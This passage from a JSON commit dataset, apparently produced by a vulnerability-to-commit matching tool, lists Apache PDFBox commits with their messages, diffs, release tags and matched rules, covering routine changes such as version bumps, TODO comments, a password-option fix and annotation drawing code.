"no-tag", + "98aa3f2e33aae00b15c6ca6ab56382960cf05a79" + ], + [ + "no-tag", + "2f97caed0dd80b670e6741cec23b903f9ad2223e" + ], + [ + "no-tag", + "a34bb3e5a9ddb35f2cf9003065dbeb38cec7fe85" + ], + [ + "no-tag", + "bc2f3322eaf7ea462f8678939ee60e31c656161e" + ], + [ + "no-tag", + "10252a40fd96a41087e4095f15f2de1bcd81da26" + ], + [ + "no-tag", + "8890ccbf0b3a233578b952748ce090f54c53fea7" + ], + [ + "no-tag", + "be4df58d7197e386fe2ac74c96bcf6a75dbcae03" + ], + [ + "no-tag", + "4983455ee89c1378aa83ff5b49057960f965f5b8" + ], + [ + "no-tag", + "cc7eeb2147fa787468542bc8a577fe35c19c0473" + ], + [ + "no-tag", + "2a29f8e55653f54dc46ea9eddacbb5a52f523964" + ], + [ + "no-tag", + "c7ff0971ae53162d39b85f1ef8d35b3c31a056bb" + ], + [ + "no-tag", + "58c362bee6662e251bde0da9b8a33e8f247ba0f4" + ], + [ + "no-tag", + "6d478f0e228563ad5a713b035767a59e0e8f85ff" + ], + [ + "no-tag", + "9b2e8e73b853d38490de98041627a3f9b075eb96" + ], + [ + "no-tag", + "dd6292ed5dbe50457885a0fbf657777f9ca5ec88" + ], + [ + "no-tag", + "7a997954b5f67d30aa00371bc6465d33744fa3eb" + ], + [ + "no-tag", + "0d5e1235f7eaf70afa55eda1cec6a9db381c94ea" + ], + [ + "no-tag", + "0cedd70a1bfc07e0e2bfbcdccf53f01cef27b0de" + ], + [ + "no-tag", + "62e41dde57c9caf5598ba365a2816080383757ce" + ], + [ + "no-tag", + "32e458545c32312ee4d73912de159694a012e933" + ] + ], + "tags": [ + "1.2.1" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + } + ] + }, + { + "commit_id": "3ff19bad2c8422f206014e9263f88e0d3136a125", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530726194, + "hunks": 2, + "message": "PDFBOX-3353: add a //TODO git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835074 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "index 0e0985250..ca1a87077 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "@@ -114,2 +114,4 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", + " }", + "+ //TODO shouldn't we set the stack?", + "+ //Or call the appropriate setStrokingColor() method from the base class?", + " }", + "@@ -171,2 +173,4 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", + " }", + "+ //TODO shouldn't we set the stack?", + "+ //Or call the appropriate setNonStrokingColor() method from the base class?", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "03938d041c6c6997baf26db65d7bfec5cc2322f4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529950973, + "hunks": 16, + "message": "[maven-release-plugin] prepare for next development iteration git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834359 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/app/pom.xml b/app/pom.xml", + "index be401960c..8aaf3a7ac 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", + "index fb0ad541f..387223ebd 100644", + "--- a/debugger-app/pom.xml", + "+++ b/debugger-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/debugger/pom.xml b/debugger/pom.xml", + "index 626d3c719..838ef1541 100644", + "--- a/debugger/pom.xml", + "+++ b/debugger/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index aac6580d2..b0e5ea08d 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 027b01f9f..3da486720 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 745f2286b..c6e94597b 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " pom", + "@@ -429,5 +429,5 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", + "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", + "- http://svn.apache.org/viewvc/maven/pom/tags/2.0.11/pdfbox-parent", + "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "+ http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 5788f62ea..2a7b9ea45 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index bb5300b5d..9e3654654 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " parent/pom.xml", + "@@ -36,8 +36,8 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", + "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", + " ", + " ", + "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", + "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", + " ", + "- http://svn.apache.org/viewvc/pdfbox/tags/2.0.11", + "+ http://svn.apache.org/viewvc/pdfbox/branches/2.0", + " ", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index a8733a59b..3d21e4e67 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index f7eb5a9af..c8f3d5402 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.11", + "+\t\t2.0.12-SNAPSHOT", + " \t\t../parent/pom.xml", + "diff --git a/tools/pom.xml b/tools/pom.xml", + "index 821dff855..b88d6c45a 100644", + "--- a/tools/pom.xml", + "+++ b/tools/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11", + "+ 2.0.12-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index 5f8b41f63..88f1ebf75 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.11", + "+\t\t2.0.12-SNAPSHOT", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "app/pom.xml", + "debugger-app/pom.xml", + "debugger/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "tools/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "72ebf37cce470d9b62fdab083a57c5c8dbcf1179" + ], + [ + "no-tag", + "3bcd28abd082a19f4a0fca62c513cae791e8fe0c" + ], + [ + "no-tag", + "91ed49cd0fa199e655d68b8b1e6727f636117322" + ], + [ + "no-tag", + "0cc393ca3393c674cbf4fd3813c68b654404d426" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + } + ] + }, + { + "commit_id": "9a882e931950fa9552009cba50fdd30190421518", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528885104, + "hunks": 1, + "message": "PDFBOX-2602: correct password option as suggested by Michael Klink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833453 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java b/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", + "index e1e6a9288..600ace61d 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", + "@@ -80,3 +80,3 @@ public final class Decrypt", + " this.alias = commandLine.getOptionValue(ALIAS);", + "- this.password = commandLine.getOptionValue(ALIAS, \"\");", + "+ this.password = commandLine.getOptionValue(PASSWORD, \"\");", + " this.keyStore = commandLine.getOptionValue(KEYSTORE);" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2602": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2602", + "relevance": 2 + } + ] + }, + { + "commit_id": "ec491e841642225089afb694d906104d1fe1e91a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529692801, + "hunks": 4, + "message": "PDFBOX-3353: support /CrossHairs git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834152 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 5424c61b5..a510d19b1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -59,2 +59,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_POINTER);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS_HAIRS);", + " }", + "@@ -138,2 +139,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "+ case PDAnnotationText.NAME_CROSS_HAIRS:", + "+ drawCrossHairs(annotation, contentStream);", + "+ break;", + " default:", + "@@ -283,2 +287,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.closeAndFillAndStroke();", + "+ ", + "+ // alternatively, this could also be drawn with Zapf Dingbats \"a21\"", + "+ // see DrawStar()", + " }", + "@@ -463,2 +470,24 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawCrossHairs(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(0);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.61f); // value from Adobe", + "+", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 1.5f, 0.001f * min / 1.5f));", + "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", + "+", + "+ // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.SYMBOL.getPath(\"circleplus\");", + "+ addPath(contentStream, path);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + " private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "cae649aa1663f68e059881a80a03f5c29e7f205f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526732793, + "hunks": 2, + "message": "PDFBOX-3353: move comment to correct class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831885 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index bd6eec8d1..87fe22d72 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -159,15 +159,2 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-", + "- //TODO line endings (LE) are missing", + "- // How it could be done by reusing some of the code from ", + "- // the Line and StrikeOut handlers", + "- // 1) if the LE is contained in SHORT_STYLES, ", + "- // shorten the first + last arms with \"this weird old trick\"", + "- // used in the StrikeOut handler", + "- // and paint", + "- // 2) do a transform so that first and last arms are imagined flat", + "- // (like in Line handler)", + "- // 3) refactor + reuse the line handler code that draws the ending shapes", + "- // the alternative would be to apply the transform to the LE shapes directly,", + "- // which would be more work and produce code difficult to understand", + " contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index edaa06b0a..160f39289 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -118,2 +118,14 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "+ //TODO line endings (LE) are missing", + "+ // How it could be done by reusing some of the code from ", + "+ // the Line and StrikeOut handlers", + "+ // 1) if the LE is contained in SHORT_STYLES, ", + "+ // shorten the first + last arms with \"this weird old trick\"", + "+ // used in the StrikeOut handler", + "+ // and paint", + "+ // 2) do a transform so that first and last arms are imagined flat", + "+ // (like in Line handler)", + "+ // 3) refactor + reuse the line handler code that draws the ending shapes", + "+ // the alternative would be to apply the transform to the LE shapes directly,", + "+ // which would be more work and produce code difficult to understand", + " cs.stroke();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "9104a894337130031436ede5a0e4ca237a8c079a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1522993912, + "hunks": 1, + "message": "PDFBOX-4172: add source code comment for default setting; closes #45 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828491 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "index 6756eaa08..9735402c4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "@@ -713,2 +713,4 @@ public final class PDAcroForm implements COSObjectable", + " {", + "+ // a field without specific settings typically needs to be translated", + "+ // to the correct position", + " boolean needsTranslation = true;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4172": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4172", + "relevance": 2 + } + ] + }, + { + "commit_id": "82f357af52829105e16ff1131bbe967d9f026aa0", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526743526, + "hunks": 1, + "message": "PDFBOX-3353: update //TODO comment because a part was done in previous commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831902 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index fe8ab0b7e..7be318260 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -151,11 +151,6 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + " //TODO line endings (LE) are missing", + "- // How it could be done by reusing some of the code from ", + "- // the Line and StrikeOut handlers", + "- // 1) if the LE is contained in SHORT_STYLES, ", + "- // shorten the first + last arms with \"this weird old trick\"", + "- // used in the StrikeOut handler", + "- // and paint", + "- // 2) do a transform so that first and last arms are imagined flat", + "- // (like in Line handler)", + "- // 3) refactor + reuse the line handler code that draws the ending shapes", + "+ // How it could be done by reusing some of the code from the line handler", + "+ // 1) do a transform so that first and last \"arms\" are imagined flat", + "+ // (like in line handler)", + "+ // 2) refactor + reuse the line handler code that draws the ending shapes", + " // the alternative would be to apply the transform to the LE shapes directly," + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "6c39d1ee5da76b7d73084ed740514edcd4d6f9b1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528548809, + "hunks": 2, + "message": "PDFBOX-4071: java coding convention, move private static field before constructor git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833234 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index 620bb669a..892ea071f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -209,2 +209,6 @@ public abstract class BlendMode", + "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", + "+ private static final Map BLEND_MODES = createBlendModeMap();", + "+ private static final Map BLEND_MODE_NAMES = createBlendModeNamesMap();", + "+", + " BlendMode()", + "@@ -382,6 +386,2 @@ public abstract class BlendMode", + "- // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", + "- private static final Map BLEND_MODES = createBlendModeMap();", + "- private static final Map BLEND_MODE_NAMES = createBlendModeNamesMap();", + "-", + " private static Map createBlendModeMap()" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "2a3af0e226242c73ea751c3b5a29b13d2a57909e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525001894, + "hunks": 2, + "message": "PDFBOX-4189: Missed the last para of the text, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830505 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index a44d464df..d98b9b3c9 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -37,4 +37,4 @@ import org.apache.pdfbox.pdmodel.font.PDType0Font;", + " * \"https://svn.apache.org/viewvc/pdfbox/trunk/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/HelloWorldTTF.java?view=markup\">PdfBox", + "- * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is supported. First, we", + "- * render some text, and then embed an image with the correct text displayed on the next page.", + "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", + "+ * supported. We read large amount of text from a file and try to render it properly.", + " *", + "@@ -146,2 +146,3 @@ public class BengaliPdfGenerationHelloWorld", + " }", + "+ realignedTexts.add(linesInAPage);", + " return realignedTexts;" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "984bd528295d4ca79f91abca9b52deacd3bee950", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524835347, + "hunks": 19, + "message": "PDFBOX-3353: fix SonarQube pet peeves, and one of mine too git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830352 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "index 19ad102f5..70dd019d2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "@@ -42,2 +42,3 @@ class CloudyBorder", + " private static final double ANGLE_34_DEG = Math.toRadians(34);", + "+ private static final double ANGLE_30_DEG = Math.toRadians(30);", + " private static final double ANGLE_12_DEG = Math.toRadians(12);", + "@@ -226,3 +227,4 @@ class CloudyBorder", + " {", + "- double w = right - left, h = top - bottom;", + "+ double w = right - left;", + "+ double h = top - bottom;", + "@@ -346,3 +348,5 @@ class CloudyBorder", + "- double alpha = array[0], dx = array[1];", + "+ double alpha = array[0];", + "+ double dx = array[1];", + "+", + " double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", + "@@ -442,7 +446,6 @@ class CloudyBorder", + " {", + "- final double D = Math.toRadians(30);", + " double a = angleCur + ANGLE_180_DEG;", + "- getArcSegment(a + alpha, a + alpha - D, cx, cy, r, r, null, false);", + "- getArcSegment(a + alpha - D, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", + "+ getArcSegment(a + alpha, a + alpha - ANGLE_30_DEG, cx, cy, r, r, null, false);", + "+ getArcSegment(a + alpha - ANGLE_30_DEG, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", + " getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", + "@@ -474,3 +477,5 @@ class CloudyBorder", + " {", + "- int n = template.length, i = 0;", + "+ int n = template.length;", + "+ int i = 0;", + "+", + " if ((n % 3) == 1)", + "@@ -503,3 +508,6 @@ class CloudyBorder", + "- double rdLeft, rdBottom, rdRight, rdTop;", + "+ double rdLeft;", + "+ double rdBottom;", + "+ double rdRight;", + "+ double rdTop;", + "@@ -577,3 +585,3 @@ class CloudyBorder", + " /**", + "- * Creates one or more Bezier curves that represent an elliptical arc.", + "+ * Creates one or more B\u00c3\u00a9zier curves that represent an elliptical arc.", + " * Angles are in radians.", + "@@ -595,3 +603,4 @@ class CloudyBorder", + " }", + "- double sweep = angleTodo, angleDone = 0;", + "+ double sweep = angleTodo;", + "+ double angleDone = 0;", + "@@ -624,3 +633,3 @@ class CloudyBorder", + " /**", + "- * Creates a single Bezier curve that represents a section of an elliptical", + "+ * Creates a single B\u00c3\u00a9zier curve that represents a section of an elliptical", + " * arc. The sweep angle of the section must not be larger than 90 degrees.", + "@@ -634,6 +643,6 @@ class CloudyBorder", + "- double cos_a = Math.cos(startAng);", + "- double sin_a = Math.sin(startAng);", + "- double cos_b = Math.cos(endAng);", + "- double sin_b = Math.sin(endAng);", + "+ double cosA = Math.cos(startAng);", + "+ double sinA = Math.sin(startAng);", + "+ double cosB = Math.cos(endAng);", + "+ double sinB = Math.sin(endAng);", + " double denom = Math.sin((endAng - startAng) / 2.0);", + "@@ -645,4 +654,4 @@ class CloudyBorder", + " {", + "- double xs = cx + rx * cos_a;", + "- double ys = cy + ry * 